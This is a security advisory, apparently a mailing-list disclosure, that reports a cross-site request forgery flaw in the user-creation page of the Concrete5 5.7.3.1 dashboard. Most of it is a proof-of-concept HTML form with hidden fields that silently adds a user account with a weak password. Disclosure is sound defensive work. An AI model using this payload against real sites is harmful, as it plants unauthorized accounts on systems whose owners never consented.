#Date: 01/04/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: XSRF
#Tested on: Windows 7
#Product: Concrete5
#Version: 5.7.3.1
#Description: Application is vulnerable to XSRF attack on page -
http://localhost/concrete/index.php/dashboard/users/add

#Proof of Concept (PoC):
------------------------------------
<form method="POST" name="form0" action="http://localhost:80/concrete
/index.php/dashboard/users/add/submit
<http://localhost/concrete/index.php/dashboard/users/add/submit>">
<input type="hidden" name="uName" value="tester12345"/>
<input type="hidden" name="uPassword" value="admin"/>
<input type="hidden" name="uEmail" value="awdwjensqjwnd@dwdw.com"/>
<input type="hidden" name="uDefaultLanguage" value="en_US"/>
<input type="hidden" name="akID[12][value]" value="1"/>
<input type="hidden" name="akID[13][value]" value="1"/>
<input type="hidden" name="ccm_token"
value="1427903943:976433537d4df96095724adba15d9e3e"/>
<input type="hidden" name="add" value="Add"/>
</form>
</body>
</html>

--
Regards,

*Joel V*